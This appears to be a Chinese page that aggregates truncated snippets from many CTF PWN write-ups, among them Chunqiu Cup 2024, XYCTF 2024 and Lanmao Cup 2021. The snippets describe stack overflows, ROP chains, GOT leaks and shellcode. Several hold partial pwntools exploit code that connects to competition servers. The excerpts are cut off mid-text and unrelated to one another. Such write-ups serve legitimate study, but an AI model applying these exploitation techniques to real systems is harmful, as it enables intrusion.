2024春秋杯网络安全联赛夏季赛-PWN-Writeup只打了第一天,费了好大劲,终于三道都出了。Shuffled_Execution保护全开,ida查看伪代码:int __fastcall main(int argc, const char **argv, const char **envp) { __int64 v3; // rax char *s; // [rsp+28h] [rbp-18h] unsigned __int64 len; // [rsp...
目录 XYCTF 2024 WriteUp >pwn 1.hello_world(签到) 2.invisible_flag 3.static_link 由于本人菜鸡和时间问题,只打了前两周,打出了pwn的三道简单题目,记录自己的做题过程。 XYCTF 2024 WriteUp >pwn 1.hello_world(签到) 常规checksec IDA反编译进入主函数 发现read可以进行两次栈溢出,同时%s格式化字符串可以...
write2file(*(undefined8 *)(*(longlong *)(param_1 + 8) + 0x10),content_buf, (longlong)content_length,flag); return; } } __nbytes = *(size_t *)&file_node->file_length; goto LAB_00011516; 这里可以看到当file搜索到列表之后的最后一个的时候会出现读取0x200字节,但是content_buf的大小只...
“第五空间”网络安全线下赛PWN部分WRITEUP 最近参加了“第五空间”网络安全线下赛,这次比赛以PWN为主,有几个比较典型的基础题。当时比赛的远程libc不方便加载调试,本人用本地libc进行复盘,写了一份writeup。 壹業 程序保护全开,应该用one_gadget获得shell。 标准的菜单题,有add、show、edit、delete功能,漏洞位于de...
[mssctf] 初赛&决赛 PWN部分writeup 2020年 第三届全国中学生网络安全竞赛 初赛 初赛终榜 blind 思路 这是一道签到盲pwn,用于getshell的函数地址已经给出,只需要循环爆破栈溢出字节数即可 通过观察发现,如果发生了栈溢出再输入#exit会没有stopping提示而直接重启服务,说明栈被破坏了,以此可以确定是否达到所需字节数...
PWN — Writeup 安迪 计算机技术与软件专业技术资格证持证人1 人赞同了该文章 目录 收起 题目:get shell (最简单的PWN题) 题目:get shell (最简单的PWN题) 平台:攻防世界 解题步骤: 用pwntool的remote连接,61.147.171.105:51738,得到flag from pwn import * io = remote("61.147.171.105",...
【技术分享】2021 蓝帽杯初赛 PWN WriteUp slient 这个是去年蓝帽杯线下的原题,找到的是这个exp 开启了沙箱,只启用了open read两个函数,通过写入shellcode之后爆破flag portable-rpg 首先来看一下题目的逻辑,实现了一个打龙的游戏。题目一共提供了四种操作,分别是add,delete,show,play。在add中,用户可以选择一共...
from pwn import * elf = ELF('pwn') libc=ELF('libc.so') p = process('./pwn') bss_addr = elf.bss(0x10) got_write = elf.got['write'] got_read = elf.got['read'] log.success("The write got address is "+ hex(got_write)) log.success("The read got address is "+ hex(got...
pwn — easy writeup 首先,先在虚拟机里check easy的保护: 发现只开了堆栈不可执行。 把文件拖进ida里,打开main函数 发现是gets溢出,转到汇编 发现偏移量为0X40 或者在gdb里生成垃圾字符,写入文件。64位的文件,得到爆出来的地址在下图位置,取后八位为地址输入语句 cyclic -l 地址...
else:p = remote('47.111.104.169', 55606)libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')one_gadget = 0x0 p.recvuntil("very interestingn")rop_address = 0x4100000p_rdi_r = 0x0000000000401213p_rsi_r = 0x0000000000401211ret_add = 0x0000000000400629leave_r = 0x00000000004007edread_plt = ...